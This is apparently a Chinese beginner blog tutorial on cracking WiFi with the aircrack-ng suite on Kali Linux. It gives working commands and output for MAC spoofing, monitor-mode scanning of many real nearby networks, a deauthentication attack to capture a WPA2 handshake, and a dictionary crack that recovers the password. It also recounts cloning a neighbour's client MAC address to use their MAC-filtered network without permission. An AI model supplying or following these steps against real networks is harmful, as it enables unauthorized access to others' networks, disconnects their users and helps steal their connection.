kali新手入门教学(14)--aircrack攻破wifi

首先是关于网卡的选择,怎么说呢…这个选择的话…网上有推荐的如果只是测试的话,平常的网卡就可以,但如果你要专门…不是很懂了不过如果有需要的话,可以参考一下这个连接
aircrack支持网卡
这篇博客讲了aircrack支持的网卡类型,其实aircrack官网也有…就是我忘记网址了…
比较推荐Realtek啦,我也用的是…不是打广告没有代理费
Realtek RTL8187L是大家公认不错的
当然还是看个人啦

当然装备再好不会用也百搭
进入kali之后

首先是常用的两句话,最好每次使用前主动输入,防止出现一些bug

关闭networkmanager和影响airmon-ng的进程,只是不知道…前段时间我用的时候还是networkmanager…现在咋需要大写了…是我记性差了吗

service  NetworkManager stop
 airmon-ng check kill

然后再把网卡插上虚拟机

ifconfig

输入ifconfig后发现并没有找到我们的wlan0,因为我们关闭了networkmanager所以网卡不会自动启用,输入

ifconfig -a

可以看到我们的wlan0,不过不一定叫wlan0,也可能是wlan1,当然本次实验就以wlan0为例
然后我一般就是直接用airmon来启动monitor模式,就不先启用wlan0再转化为monitor模式

修改mac地址(可选),修改mac地址一定需要wlan0除以down状态

macchanger -m  80:f1:1c:44:16:9e wlan0

Current MAC:   70:f2:1c:33:16:9e (unknown)
Permanent MAC: 70:f2:1c:33:16:9e (unknown)
New MAC:      90:f1:1c:44:10:9e (unknown)

输入machanger命令可以改变我们网卡的mac地址,起到一定程度的迷惑作用,当然有时候对于一些无密码的wifi靠识别mac地址判断的wifi也有作用

airmon-ng  start wlan0

启用网卡为monitor模式,然后再输入ifconfig可以看到有个wlan0mon的设备,接下来就可以来干活了
monitor模式的网卡可以监听也可以发包

airodump-ng wlan0mon 

开始监听周围的ap,可以看到有很多的wifi信号,因为我们是在漫无目的的查看,还在寻找目标,就不加参数限制了

以下是结果

 CH 14 ][ Elapsed: 36 s ][ 2020-05-29 16:43                                                                                                                                                                      
                                                                                                                                                                                                                 
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                     
 88:25:93:DB:CD:5A  -46        8        0    0  12  270   WPA2 CCMP   PSK  TP-LINK_CD5A                                                                                                                          
 E8:65:D4:15:2C:98  -56       18        0    0   7  270   WPA2 CCMP   PSK  wifi                                                                                                                                  
 EC:9C:32:60:36:11  -55       16        0    0   7   65   WPA2 CCMP   PSK  JC3902720710000C01060245                                                                                                              
 B8:F8:83:00:6D:F8  -61        6        3    0  11  405   WPA2 CCMP   PSK  TP-LINK_6DF8                                                                                                                          
 C8:3A:35:35:30:50  -65       13        0    0   7  270   WPA2 CCMP   PSK  888                                                                                                                                   
 74:DA:DA:8F:99:A4  -65        3        0    0   1  130   WPA2 CCMP   PSK  LZZ                                                                                                                                   
 B8:F8:83:45:E0:30  -65       11        2    0   6  405   WPA2 CCMP   PSK  w'r'x                                                                                                                                 
 F8:9A:78:9E:54:95  -67        9        0    0  11  270   WPA2 CCMP   PSK  <length:  8>                                                                                                                          
 34:96:72:33:27:96  -67        4        0    0  11  405   WPA2 CCMP   PSK  TP-LINK_2796                                                                                                                          
 28:2C:B2:23:46:40  -66       12       58    0   1  270   WPA2 CCMP   PSK  TP-LINK_234640                                                                                                                        
 F8:9A:78:9E:54:91  -66        7        0    0  11  270   WPA2 CCMP   PSK  <length: 32>                                                                                                                          
 54:75:95:B0:12:C3  -68        3        0    0   1  270   WPA2 CCMP   PSK  TP-LINK_12C3                                                                                                                          
 54:75:95:B0:52:B6  -69        4        0    0   1  270   WPA2 CCMP   PSK  TP-LINK_52B6                                                                                                                          
 E0:C6:3C:A2:9D:31  -66        5        0    0  11  130   WPA  CCMP   PSK  ChinaNet-UZZY                                                                                                                         
 02:4B:F3:09:8E:94  -72       14        1    0   8  130   WPA2 CCMP   PSK  CMCC-6baW                                                                                                                             
 C8:3A:35:24:EE:80  -68        6        0    0   7  270   WPA2 CCMP   PSK  Tenda_24EE80                                                                                                                          
 D4:83:04:D1:5F:CC  -68       12        0    0   6  270   WPA2 CCMP   PSK  FAST_5FCC                                                                                                                             
 8C:8F:8B:80:C3:1E  -70        0        0    0   4  130   WPA2 CCMP   PSK  CMCC-EhFX                                                                                                                             
 3C:57:4F:5D:59:08  -70        8        2    0  11  130   WPA2 CCMP   PSK  CMCC-md7u                                                                                                                             
 B8:3A:08:FE:06:B1  -70       11        0    0   4  130   WPA2 CCMP   PSK  Tenda_FE06B0                                                                                                                          
 D8:15:0D:AF:79:F0  -73        5        0    0   6  405   WPA2 CCMP   PSK  TP-LINK_79F0                                                                                                                          
 5C:09:79:D6:FB:3C  -70       10        0    0   6  130   WPA2 CCMP   PSK  ChinaNet-6Mim                                                                                                                         
 C8:3A:35:BF:2A:D8  -72        7        0    0   2  270   WPA2 CCMP   PSK  Tenda_BF2AD8                                                                                                                          
 F8:9A:78:9D:AE:D1  -73        7        0    0   6  270   WPA2 CCMP   PSK  <length: 32>                                                                                                                          
 D0:C7:C0:81:B0:66  -72        2        0    0  11  270   WPA2 CCMP   PSK  FAST_B066                                                                                                                             
 C8:3A:35:22:1A:F8  -73        6        0    0   9  270   WPA2 CCMP   PSK  Tenda_221AF8                                                                                                                          
 14:75:90:1B:7D:84  -75       10        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_liu                                                                                                                           
 B4:DE:DF:0F:EE:B7  -73        3        0    0   9  130   WPA2 CCMP   PSK  ChinaNet-T7w7                                                                                                                         
 B0:95:8E:67:3A:39  -72        5        0    0   6  405   WPA2 CCMP   PSK  TP-LINK_3A39                                                                                                                          
 B8:F8:83:00:6C:F8  -73        5        0    0   1  405   WPA2 CCMP   PSK  TP-LINK_6CF8                                                                                                                          
 F8:6C:E1:11:5E:50  -73       11        0    0   4  130   WPA2 CCMP   PSK  CMCC-VWjq                                                                                                                             
 C8:3A:35:E6:E1:E0  -74       10        0    0   5  130   WPA2 CCMP   PSK  Tenda_E6E1E0                                                                                                                          
 1C:60:DE:8B:8E:06  -74        2        1    0  13  270   WPA2 CCMP   PSK  songchenxi                                                                                                                            
 2E:B2:1A:98:68:47  -75       13        4    0   8  360   WPA2 CCMP   PSK  @PHICOMM_45                                                                                                                           
 80:41:26:CA:F8:B8  -75        5        0    0  11  130   WPA2 CCMP   PSK  CMCC-eif2                                                                                                                             
 CC:08:FB:ED:B0:D9  -74        3        0    0  11  270   WPA2 CCMP   PSK  TP-LINK_B0D9                                                                                                                          
 CC:2D:21:D0:98:50  -73       11        0    0   7  270   WPA2 CCMP   PSK  Tenda_888888                                                                                                                          
 1C:FA:68:AD:1D:2E  -75        6        0    0   5  130   WPA2 CCMP   PSK  MERCURY_AD1D2E                                                                                                                        
 3C:2C:94:00:FE:EF  -76        4        0    0  11   65   WPA2 CCMP   PSK  Midea_AC1265                                                                                                                          
 F8:9A:78:9D:AE:D5  -74        9        0    0   6  270   WPA2 CCMP   PSK  <length:  8>                                                                                                                          
 D4:EE:07:52:56:7E  -76        2        0    0   8  130   WPA2 CCMP   PSK  HiWiFi_52567E                                                                                                                         
 BC:0F:2B:85:64:FA  -77        9        0    0   9   65   WPA2 CCMP   PSK  midea_ac_0460                                                                                                                         
Quitting...                                                                               

因为我的网卡带了一个小天线,所以可以找到很多的wifi,下面就拿一个来讲解一下

 CH 14 ][ Elapsed: 36 s ][ 2020-05-29 16:43                                                                                                                                                                      
                                                                                                                                                                                                                 
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  
 E8:65:D4:15:2C:98  -56       18        0    0   7  270   WPA2 CCMP   PSK  wifi              

CH14是当前网卡处以的信道,因为每个ap都会像固定的几个信道发出信号,所以默认情况下我们的网卡是会自动跳转信道,收集每个信道的ap,信道可以理解为火车道,上面有不同的ap在跑
elapsed是指经过的时间
然后是当前时间
bssid是指ap的mac地址
pwr是强度,均为负值,约靠近0说明信号越好,-1是错误的信号,大于-50都是强度不错的,然后-50~-75还是能用…剩下的就算了
beacons 发送的广播数量
#Data, 传递的数据包数量
CH 信道
ENC 方式,通讯加密技术 有wps,wpa1,wpa2
ESSID wifi的名称,就是我们每天看到的wifi名,这个叫wifi,哈很直接

如果周围ap少的话还会在下面显示当前的客户机…我这里太多了就没有显示

又做了一次实验,又出现了(因为我没让他显示太多ap,就出现了几个station(客户机))

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                                                                               
                                                                                                                                                                                                                 
 (not associated)   58:63:56:6B:B0:FF  -56    0 - 1      0        1                                                                                                                                              
 (not associated)   F0:85:C1:40:48:68  -66    0 - 1      0        2                                                                                                                                              
 88:F5:6E:F2:B5:73  40:5B:D8:C6:6D:05  -14    0 - 1     18       13                                                                                                                                              
 28:2C:B2:23:46:40  E8:F2:E2:C5:E4:94   -1    1e- 0      0       27                                                                                                                                              
 D8:15:0D:AF:79:F0  20:47:DA:BF:DF:A4  -74    0 - 6e     0        1 

这些是客户机bssid对应的是他们建立关系的ap地址,not associated表明没有建立联系,断网了.
station就是客户端的mac地址
另外可以注意probes里面的信息,因为客户机断线以后,他会跟傻子一样像周围发出信号,比如说他之前和wifi建立过关系,他会一直发包问:“wifi,你在哪,我要上网",然后probe里面就会出现wifi,这时候就可以利用另一种伪造ap的方式攻击客户机,这也是一种攻击方式

既然有客户机,就可以搞事情了

airodump-ng --bssid 21:2C:B2:23:46:40  wlan0mon   

–bssid 就是指定对应的wifi的mac地址,也就是我们要攻击的ap
这个是有客户机的,就搞他

然后再搞之前先简要讲解一下原理
为什么我们可以破解密码
原理是这样的
我们去监听ap的时候,如果这个ap下有用户,我们可以主动发包打断ap与用户的连接,但由于用户和ap都会默认自动连接,我们就可以通过airmon-ng的监听获取到握手的信息,然后再通过字典暴力破解握手信息,就可以得到对应的wifi密码

忘记了,要保存到文件里面…不然等会下一步会有问题
因为我们要通过文件里面保存的握手信息进行暴力破解

 airodump-ng --ivs --bssid FC:D7:33:3F:BC:F8 –w test-c 11 wlan0mon

-c指定信道,对应ap的信道,这样有利于我们找到他
-w 保存的文件名
–ivs只抓取可用于破解的IVS数据报文

然后用我们的大杀器
打掉station

另开一个console
结果station跑了…
算了
还是拿自己做实验

提示一下,这里最好要指定我们的ap信道,因为之后攻击的时候发包需要保证ap和网卡在一个信道…但我们的网卡如果不指定的话会到处乱跑,跳到其他的信道…导致无法发包

airodump-ng wlan0mon --bssid 66:F5:6E:F2:B5:73 -c 11 --ivs -w test    

-c指定信道,可以在之前的airodump里找到对应的信道
然后可以看到ap和station的信息,接下来就开始攻击了

CH 11 ][ Elapsed: 48 s ][ 2020-05-29 17:47]                                                                                                    
                                                                                                                                                                                                                 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                                             
                                                                                                                                                                                                                 
 11:C5:6E:F2:B5:73  -19  65      319       36    0  11  180   WPA2 CCMP   PSK  法拉利                                                                                                                            
                                                                                                                                                                                                                 
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                                                                               
                                                                                                                                                                                                                 
11:C5:6E:F2:B5:73  40:5B:D7:C6:6D:05  -14    1e- 6e    46      872  EAPOL   

我们经常会遇见这样的情况,下面的station为空,找到的ap没找到station,可能是station离我们太远了…没有发现他…或者他溜了…或者他去找别的ap了…

CH 12 ][ Elapsed: 3 mins ][ 2020-05-29 16:56                                                                                                                                                                    
                                                                                                                                                                                                                 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                                             
                                                                                                                                                                                                                 
 88:25:93:DB:CD:5A  -45  72     1443        0    0  12  270   WPA2 CCMP   PSK  TP-LINK_CD5A                                                                                                                      
                                                                                                                                                                                                                 
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                                                                               
                                                                                                                                                                                                              
Quitting...
aireplay-ng -0 6  -a 11:C5:6E:F2:B5:73  -c  40:5B:D7:C6:6D:05   wlan0mon

-0是攻击模式,这里是打掉攻击
6是发6个包,打6次
-a 指定攻击的ap目标
-c 指定受害的station地址
wlan0mon就是我们的网卡
如果攻击成功就会在之前抓包的那个地方返回

 CH 11 ][ Elapsed: 48 s ][ 2020-05-29 17:47 ][ WPA handshake: 11:C5:6E:F2:B5:73

然后ctrl+c停掉
可以看到在当前目录下有个叫test-01.ivs的文件
然后就可以结合字典进行破解
默认kali自带了许多字典文件
在/usr/share/wordlists下面

aircrack-ng -w /usr/share/wordlists/fern-wifi/common.txt test-03.ivs    

我使用的是fern-wifi下面的common,txt
test-03.ivs就是我们刚才的ivs文件,因为我做了多次实验,所以就叫…test-03
当然如果之前没有加–ivs,会得到很多test-01.的文件,选用里面的cap命令一样,改一下后缀就可以

                                                                                                                                                                                              
                               Aircrack-ng 1.6                                                                                                                                                                   
                                                                                                                                                                                                                 
      [00:00:00] 25/479 keys tested (663.00 k/s)                                                                                                                                                                 
                                                                                                                                                                                                                 
      Time left: 0 seconds                                       5.22%                                                                                                                                           
                                                                                                                                                                                                                 
                           KEY FOUND! [ 123456]                                                                                                                                                               
                                                                                                                                                                                                                 
                                                                                                                                                                                                                 
      Master Key     : 1D 7B B1 8F DE 24 B5 B8 CF 8A F3 6F 8F FE 59 C6                                                                                                                                           
                       7A AA AF F4 FC 47 5A 4A EB E1 8D F4 C4 BD 70 DB                                                                                                                                           
                                                                                                                                                                                                                 
      Transient Key  : 74 3E 3E DA 3A 84 FA A3 58 4B DC BC B4 4E 2E 66                                                                                                                                           
                       55 C7 7A 08 69 37 98 F9 D2 E2 D7 B0 25 E9 10 30                                                                                                                                           
                       60 30 07 72 4B 66 E6 31 AE FD AF 16 7B 4A AE BA                                                                                                                                           
                       EE 8F AC 0C C1 83 8D 0A 78 4B F0 A2 CC BA 61 51                                                                                                                                           
                                                                                                                                                                                                                 
      EAPOL HMAC     : 30 A2 B9 08 30 1D A8 42 3C 7D F7 9A F1 62 89 41    

然后就开始破解了,如果找到了就会主动退出并且可以看到
破解就看你的电脑性能啦,gpu,僵尸网络,并行运算…反正只要你想破解,都可以破解

然后再分享一个例子
前端时间我研究的时候,楼上有个wifi是不需要密码,但连上了以后上不了网,也没有cmcc那种认证
这也是一个比较常见的自认为安全的方式,他的原理就是他限制了mac地址,只有这几个mac地址可以上网,其他的不可以
但自以为安全的他有很大的漏洞

首先我也是

airodump-ng --bssid  11:25:93:DB:CD:5A -c  12 wlan0mon

类似的命令去监听,然后发现有一个小可爱在使用,然后果断复制mac地址
接下来就是修改我们网卡的mac地址

airmon-ng stop wlan0mon 

输入ifconfig看不见我们的网卡,ifconfig -a看见有个wlan0
如果输入ifconfig可以看见你的网卡,那么你还要多执行一步

ifconfig wlan0 down

确认wlan0处于down的状态下用刚才的macchanger命令

macchanger -m  80:f1:1c:44:16:9e wlan0

把刚才发现的小可爱mac地址(客户机的)复制上去,然后再启动网卡

ifconfig wlan0 up

这时候连密码也不需要破解,直接就用网卡连网,发现这时候连上就可以上网了,但会比较卡,因为有两个mac地址一样的station,会出现发包错误…但最起码哈哈…成功了

你可能感兴趣的:(kali新手入门教学)